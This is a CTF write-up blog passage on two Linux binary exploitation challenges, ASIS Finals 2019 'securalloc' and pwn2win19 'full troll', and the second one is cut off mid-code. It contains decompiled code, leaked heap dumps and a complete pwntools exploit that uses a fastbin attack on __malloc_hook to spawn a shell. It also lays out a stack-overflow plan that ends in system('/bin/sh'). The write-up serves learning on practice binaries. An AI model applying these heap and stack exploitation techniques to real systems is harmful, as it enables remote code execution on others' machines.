libsalloc.so</span> <span class="p">{</span> <span class="n">__int64</span> <span class="n">v0</span><span class="p">;</span> <span class="n">__int64</span> <span class="n">v1</span><span class="p">;</span> <span class="kt">void</span> <span class="o">*</span><span class="n">result</span><span class="p">;</span> <span class="kt">signed</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="n">stream</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">"/dev/urandom"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">stream</span> <span class="p">)</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;=</span> <span class="mi">7</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="n">fread</span><span class="p">(</span><span class="o">&amp;</span><span class="n">canary</span><span class="p">,</span> <span class="mi">8uLL</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">,</span> <span class="n">stream</span><span class="p">);</span> <span class="n">fclose</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> <span class="n">v0</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span> <span class="n">LOBYTE</span><span class="p">(</span><span class="n">v0</span><span class="p">)</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">v1</span> <span class="o">=</span> <span class="n">v0</span><span class="p">;</span> <span class="n">result</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">canary</span><span class="p">;</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">v1</span><span class="p">;</span> <span class="k">return</span> <span class="n">result</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">secure_malloc</code> does a malloc with a few modification to the chunk including adds size of the chunk and a canary before top chunk.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">_DWORD</span> <span class="o">*</span><span class="kr">__fastcall</span> <span class="nf">secure_malloc</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len_buffer</span><span class="p">)</span> <span class="c1">// libsalloc.so</span> <span class="p">{</span> <span class="n">_DWORD</span> <span class="o">*</span><span class="n">v2</span><span class="p">;</span> <span class="n">v2</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="n">len_buffer</span> <span class="o">+</span> <span class="mi">16</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">v2</span> <span class="p">)</span> <span class="n">__abort</span><span class="p">(</span><span class="s">"Resource depletion (secure_malloc)"</span><span class="p">);</span> <span class="o">*</span><span class="n">v2</span> <span class="o">=</span> <span class="n">len_buffer</span><span class="p">;</span> <span class="n">v2</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="n">len_buffer</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">v2</span> <span class="o">+</span> <span class="n">len_buffer</span> <span class="o">+</span> <span class="mi">8</span><span class="p">)</span> <span class="o">=</span> <span class="n">canary</span><span class="p">;</span> <span class="k">return</span> <span class="n">v2</span> <span class="o">+</span> <span class="mi">2</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">secure_free</code> does a free to a chunk that pointed by a pointer saved in global variable. This global variable always set to 0 after the chunk is freed, this prevents a double free vulnerability.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="kr">__fastcall</span> <span class="nf">secure_free</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">)</span> <span class="c1">// libsalloc.so</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">v1</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="n">a1</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v1</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">8</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">4</span><span class="p">)</span> <span class="o">-</span> <span class="n">v1</span> <span class="o">!=</span> <span class="mi">1</span> <span class="p">)</span> <span class="n">__abort</span><span class="p">(</span><span class="s">"*** double free detected ***: &lt;unknown&gt; terminated"</span><span class="p">);</span> <span class="n">__heap_chk_fail</span><span class="p">(</span><span class="n">a1</span><span class="p">);</span> <span class="n">memset</span><span class="p">((</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">8</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="p">(</span><span class="n">v1</span> <span class="o">+</span> <span class="mi">16</span><span class="p">));</span> <span class="n">free</span><span class="p">((</span><span class="n">a1</span> <span class="o">-</span> <span class="mi">8</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <p>Binary’s protection:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ checksec securalloc.elf Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled </span></code></pre></div></div> <p>Full RELRO means we can’t just overwrite GOT table. We can overwrite <code class="language-plaintext highlighter-rouge">__malloc_hook</code> or <code class="language-plaintext highlighter-rouge">__free_hook</code> address to get arbitrary shell from one gadget RCE. And with PIE enable we should leak some address to bypass it.</p> <h4 id="the-bugs">The bugs</h4> <ol> <li> <p>There are datas left in the heap section that hasn’t been cleared. Those are pointers from <code class="language-plaintext highlighter-rouge">FILE</code> structures and the stream datas from <code class="language-plaintext highlighter-rouge">/dev/urandom</code>. Those come from <code class="language-plaintext highlighter-rouge">secure_init</code> function as the function called <code class="language-plaintext highlighter-rouge">fopen()</code> that lying stream data in heap.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp"> pwndbg&gt;</span><span class="w"> </span>x/40gx 0x55cadc53e000 <span class="go"> 0x55cadc53e000: 0x0000000000000000 0x0000000000021001 0x55cadc53e010: 0x00000000fbad240c 0x0000000000000000 0x55cadc53e020: 0x0000000000000000 0x0000000000000000 0x55cadc53e030: 0x0000000000000000 0x0000000000000000 0x55cadc53e040: 0x0000000000000000 0x0000000000000000 0x55cadc53e050: 0x0000000000000000 0x0000000000000000 0x55cadc53e060: 0x0000000000000000 0x0000000000000000 </span><span class="gp"> 0x55cadc53e070: 0x0000000000000000 0x00007fd6b90d4540 #</span><span class="w"> </span>leak libc_base <span class="go"> 0x55cadc53e080: 0x00000000ffffffff 0x0000000000000000 </span><span class="gp"> 0x55cadc53e090: 0x0000000000000000 0x000055cadc53e0f0 #</span><span class="w"> </span>leak heap_base <span class="go"> 0x55cadc53e0a0: 0xffffffffffffffff 0x0000000000000000 0x55cadc53e0b0: 0x000055cadc53e100 0x0000000000000000 0x55cadc53e0c0: 0x0000000000000000 0x0000000000000000 0x55cadc53e0d0: 0x00000000ffffffff 0x0000000000000000 0x55cadc53e0e0: 0x0000000000000000 0x00007fd6b90d26e0 0x55cadc53e0f0: 0x0000000000000000 0x0000000000000000 </span></code></pre></div> </div> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp"> pwndbg&gt;</span><span class="w"> </span>x/40gx 0x55cadc53e000 + 0x200 <span class="go"> 0x55cadc53e200: 0x0000000000000000 0x0000000000000000 0x55cadc53e210: 0x0000000000000000 0x0000000000000000 0x55cadc53e220: 0x0000000000000000 0x0000000000000000 0x55cadc53e230: 0x00007fd6b90d2260 0x0000000000020dd1 0x55cadc53e240: 0xf12516d8ca2e81b4 0x7e8b57554cc982e8 0x55cadc53e250: 0xd692ccd79c247472 0x5004aee0dc637fc0 0x55cadc53e260: 0x2c0400e06b223061 0x9c6b2b8d65e498ee </span><span class="gp"> 0x55cadc53e270: 0x6f0e916c6c516f47 0x60dd7ea4d53a72de #</span><span class="w"> </span>leak heap_canary <span class="go"> 0x55cadc53e280: 0xd671437e9d5484b3 0x9e74ed4d0647b99c 0x55cadc53e290: 0x6b7d8ba7e5cffd57 0xf0d7263adb25d3cd 0x55cadc53e2a0: 0x3da1c028bde478f0 0xd42751adc0d8454c 0x55cadc53e2b0: 0xa0024ff9bdfd0f8d 0x8dae4dcbdc733df8 0x55cadc53e2c0: 0xa0b11197ff8da820 0xe2b9cf092ff1149b 0x55cadc53e2d0: 0xcd52b1a42921b577 0xab0c51edf9703e49 0x55cadc53e2e0: 0x33ff1298e2cd6628 0x201acdcc046bcda9 </span></code></pre></div> </div> </li> <li> <p>After leaking the heap_canary, we can bypass overflow checker by using function edit in securalloc binary. There isn’t any buffer’s length checking so we can just insert any data. Stop it by entering <code class="language-plaintext highlighter-rouge">\n</code> (newline).</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="kt">int</span> <span class="nf">edit_C1A</span><span class="p">()</span> <span class="c1">// securalloc.elf</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Data: "</span><span class="p">);</span> <span class="n">fn_read_B1A</span><span class="p">(</span><span class="n">ptr_malloc_202050</span><span class="p">);</span> <span class="k">return</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Updated!"</span><span class="p">);</span> <span class="p">}</span> </code></pre></div> </div> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">_BYTE</span> <span class="o">*</span><span class="kr">__fastcall</span> <span class="nf">fn_read_B1A</span><span class="p">(</span><span class="n">_BYTE</span> <span class="o">*</span><span class="n">buffer</span><span class="p">)</span> <span class="c1">// securalloc.elf</span> <span class="p">{</span> <span class="n">_BYTE</span> <span class="o">*</span><span class="n">buf</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span> <span class="n">buf</span> <span class="o">=</span> <span class="n">buffer</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">buf</span> <span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="o">!</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">1uLL</span><span class="p">)</span> <span class="p">)</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="o">*</span><span class="n">buf</span> <span class="o">==</span> <span class="sc">'\n'</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="o">*</span><span class="n">buf</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="k">return</span> <span class="p">(</span><span class="n">buf</span> <span class="o">-</span> <span class="n">buffer</span><span class="p">);</span> <span class="p">}</span> </code></pre></div> </div> </li> </ol> <h4 id="exploitations-scenario">Exploitation’s scenario</h4> <ol> <li> <p>Leaking libc_base, heap_base, and heap_canary.</p> </li> <li> <p>Using fastbin attack and overwriting <code class="language-plaintext highlighter-rouge">__malloc_hook</code> pointer.</p> </li> <li> <p>Get one gadget RCE.</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="helpers">Helpers</h4> <p>For the sake of tidy script.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./securalloc.elf"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="n">l</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./libc.so.6"</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="c1">#gdb.attach(r) </span> <span class="k">def</span> <span class="nf">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">l</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"&gt; "</span><span class="p">,</span> <span class="s">"1"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Size: "</span><span class="p">,</span> <span class="n">l</span><span class="p">.</span><span class="n">__str__</span><span class="p">())</span> <span class="k">def</span> <span class="nf">edit</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">c</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"&gt; "</span><span class="p">,</span> <span class="s">"2"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"Data: "</span><span class="p">,</span> <span class="n">c</span><span class="p">)</span> <span class="k">def</span> <span class="nf">show</span><span class="p">(</span><span class="n">r</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"&gt; "</span><span class="p">,</span> <span class="s">"3"</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Data: "</span><span class="p">)</span> <span class="k">def</span> <span class="nf">free</span><span class="p">(</span><span class="n">r</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">"&gt; "</span><span class="p">,</span> <span class="s">"4"</span><span class="p">)</span> <span class="n">path_to_libc</span> <span class="o">=</span> <span class="s">'libc.so.6'</span> <span class="n">ogt</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="n">generate_one_gadget</span><span class="p">(</span><span class="n">path_to_libc</span><span class="p">):</span> <span class="n">ogt</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> </code></pre></div></div> <h4 id="stage-1-leaking-some-information">Stage 1. Leaking some information</h4> <p>Using some alignment in creating the chunk, we can easily leak the data we want.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x8</span><span class="p">)</span> <span class="n">show</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:]</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">leak</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">l</span><span class="p">.</span><span class="n">address</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span><span class="o">-</span><span class="mh">0x3c5540</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x8</span><span class="p">)</span> <span class="n">show</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:]</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">leak</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">heap_base</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span><span class="o">-</span><span class="mh">0xf0</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">):</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x20</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x8</span><span class="p">)</span> <span class="n">show</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">r</span><span class="p">.</span><span class="n">recvline</span><span class="p">()[:</span><span class="o">-</span><span class="mi">1</span><span class="p">:]</span> <span class="n">leak</span> <span class="o">=</span> <span class="n">leak</span><span class="p">.</span><span class="n">ljust</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="p">)</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leak</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xffffffffffffff00</span> </code></pre></div></div> <h4 id="stage-2-fastbin-attack">Stage 2. Fastbin attack</h4> <p>To make malloc to return to an arbitrary address is a little bit tricky. malloc checks the size of the chunk that’s pointed by fastbin’s next free chunk, if the size of the next targeted chunk isn’t satisfy <code class="language-plaintext highlighter-rouge">n &lt; size &lt; n + 0xf</code> (n is previous chunk’s size) that malloc will return <code class="language-plaintext highlighter-rouge">fastbin corruption</code> error. Using technique from Quentinmeffre, we can pad a little bit to achieve arbitrary write to <code class="language-plaintext highlighter-rouge">__malloc_hook</code>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">free</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">)</span> <span class="n">free</span><span class="p">(</span><span class="n">r</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x10</span><span class="p">)</span> <span class="n">malloc_hook</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"__malloc_hook"</span><span class="p">]</span> <span class="n">realloc</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"__libc_realloc"</span><span class="p">]</span> <span class="n">one</span> <span class="o">=</span> <span class="n">l</span><span class="p">.</span><span class="n">address</span> <span class="o">+</span> <span class="n">ogt</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="n">ploadx</span> <span class="o">=</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span><span class="o">*</span><span class="mi">2</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x71</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">malloc_hook</span> <span class="o">-</span> <span class="mh">0x23</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">ploadx</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">)</span> <span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x50</span><span class="p">)</span> <span class="n">ploady</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">3</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">one</span><span class="p">)</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">realloc</span><span class="o">+</span><span class="mi">16</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">ploady</span><span class="p">)</span> </code></pre></div></div> <p>We overwrite <code class="language-plaintext highlighter-rouge">__malloc_hook</code> with <code class="language-plaintext highlighter-rouge">realloc</code>+0x10 function because we need to set appropriate parameter for the one gadget function.</p> <h4 id="stage-3-triggering-rce">Stage 3. Triggering RCE</h4> <p>Simply call malloc to trigger the RCE chain.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span> </code></pre></div></div> <h4 id="pwned">Pwned</h4> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ python solve.py [+] Starting local process './securalloc.elf': pid 32328 </span><span class="gp">[*] Stage 1 &gt;</span><span class="w"> </span>Leaking libc_base addr, heap_base addr, and heap_canary value <span class="gp">[+] &gt;</span><span class="w"> </span>libc_base: 0x7fd6b8d0f000, heap_base: 0x55cadc53e000, heap_canary: 0x60dd7ea4d53a7200 <span class="gp">[*] Stage 2 &gt;</span><span class="w"> </span>Fastbin attack <span class="gp">[*] Stage 3 &gt;</span><span class="w"> </span>Triggering RCE <span class="go">[+] Pwned! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">uname</span> <span class="nt">-a</span> <span class="gp">Linux fokt 5.0.0-31-generic #</span>33~18.04.1-Ubuntu SMP Tue Oct 1 10:20:39 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux </code></pre></div></div> Fri, 29 Nov 2019 00:00:00 +0000 https://fachrioktavian.github.io//blog/ctf/asisfin19-securalloc/ https://fachrioktavian.github.io//blog/ctf/asisfin19-securalloc/ ctf linux x64 heap buffer overflow fastbin attack binary exploitation ctf <h3 id="sources">Sources</h3> <p><a href="https://github.com/fachrioktavian/ctf-writeup/tree/master/pwn2win19/fulltroll">https://github.com/fachrioktavian/ctf-writeup/tree/master/pwn2win19/fulltroll</a></p> <h3 id="summary">Summary</h3> <p>This challenge is from pwn2win19 ctf. I didn’t join the ctf. Solve this challenge by scraping for the binary in ctftime and solve it locally.</p> <h4 id="overview">Overview</h4> <p>The binary is a program which loop asking for password, if we get the right password it will print out the data inside <code class="language-plaintext highlighter-rouge">secret.txt</code>. If you think the simple way to solve this challenge is open <code class="language-plaintext highlighter-rouge">flag.txt</code>, you wrong :p. As the challenge’s name is <code class="language-plaintext highlighter-rouge">full troll</code>, sure it’s full of troll.</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ ./full_troll Welcome my friend. Tell me your password. a Not even close! Welcome my friend. Tell me your password. b Not even close! Welcome my friend. Tell me your password. </span></code></pre></div></div> <p>Binary’ protection:</p> <div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">❯ checksec full_troll Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled </span></code></pre></div></div> <h4 id="the-bugs">The bugs</h4> <ol> <li> <p>There is a buffer overflow vulnerability exists on a function that reads user input for variable <code class="language-plaintext highlighter-rouge">buf_password</code> as there is no check for buffer length.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">main</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a2</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">a3</span><span class="p">)</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">is_valid</span><span class="p">;</span> <span class="kt">char</span> <span class="o">*</span><span class="n">v5</span><span class="p">;</span> <span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">;</span> <span class="kt">char</span> <span class="n">buf_password</span><span class="p">;</span> <span class="kt">char</span> <span class="n">filename</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="n">__int64</span> <span class="n">canary</span><span class="p">;</span> <span class="p">...</span> <span class="n">snip</span> <span class="p">...</span> <span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Welcome my friend. Tell me your password."</span><span class="p">);</span> <span class="n">fn_read_E5D</span><span class="p">(</span><span class="n">stdin</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">buf_password</span><span class="p">);</span> <span class="c1">// vuln</span> <span class="p">...</span> <span class="n">snip</span> <span class="p">...</span> <span class="k">return</span> <span class="mi">0LL</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div> </div> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">fn_read_E5D</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">stream</span><span class="p">,</span> <span class="n">__int64</span> <span class="n">buffer</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">v3</span><span class="p">;</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="p">;</span> <span class="o">++</span><span class="n">i</span> <span class="p">)</span> <span class="p">{</span> <span class="n">v3</span> <span class="o">=</span> <span class="n">fgetc</span><span class="p">(</span><span class="n">stream</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span> <span class="n">v3</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span> <span class="n">v3</span> <span class="o">==</span> <span class="sc">'\n'</span> <span class="p">)</span> <span class="k">break</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">buffer</span> <span class="o">+</span> <span class="n">i</span><span class="p">)</span> <span class="o">=</span> <span class="n">v3</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="n">i</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> </div> </li> </ol> <h4 id="exploitations-scenario">Exploitation’s scenario</h4> <ol> <li> <p>Reverse engineering program to get password value that it wants</p> </li> <li> <p>Leaking canary value.</p> </li> <li> <p>Defeating pie by leaking start address of program in <code class="language-plaintext highlighter-rouge">/proc/self/maps</code>.</p> </li> <li> <p>Leaking libc using puts function</p> </li> <li> <p>Calling single gadget to call system(“/bin/sh”)</p> </li> </ol> <h3 id="exploitation">Exploitation</h3> <h4 id="helper">Helper</h4> <p>For cleaner exploit script, we use helper function. I use one gadget to trigger RCE later in stage 5.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">sendpwd</span><span class="p">(</span><span class="n">r</span><span class="p">,</span> <span class="n">cnt</span><span class="p">):</span> <span class="n">r</span><span class="p">.</span><span class="n">recv</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cnt</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./full_troll"</span><span class="p">,</span> <span class="n">aslr</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span> <span class="n">e</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./full_troll"</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="n">l</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">'/lib/x86_64-linux-gnu/libc.so.6'</span><span class="p">,</span> <span class="n">checksec</span><span class="o">=</span><span class="bp">False</span><span class="p">)</span> <span class="n">path_to_libc</span> <span class="o">=</span> <span class="s">'/lib/x86_64-linux-gnu/libc.so.6'</span> <span class="n">ogt</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">offset</span> <span class="ow">in</span> <span class="n">generate_one_gadget</span><span class="p">(</span><span class="n">path_to_libc</span><span class="p">):</span> <span class="n">ogt</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">offset</span><span class="p">)</span> <span class="c1">#gdb.attach(r, "b *$rebase(0xF4A)") </span></code></pre></div></div> <h4 id="stage-1-reverse-engineering-password">Stage 1. Reverse engineering password</h4> <p>There is logic function to check password whether it’s right or wrong.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">signed</span> <span class="n">__int64</span> <span class="kr">__fastcall</span> <span class="nf">check_password_A53</span><span class="p">(</span><span class="n">__int64</span> <span class="n">a1</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span> <span class="n">strlen</span><span class="p">(</span><span class="n">a1</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">22</span> <span class="p">)</span> <span class="k">return</span> <span class="mi">1LL</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span> <span class="p">(</span><span class="o">*</span><span class="n">a1</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">1</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0x3F</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">^</span> <span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">2</span><span class="p">))</span> <span class="o">==</span> <span class="mh">0xB</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">*</span><span class="p">(</span><span class="n">a1</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)</span> <span 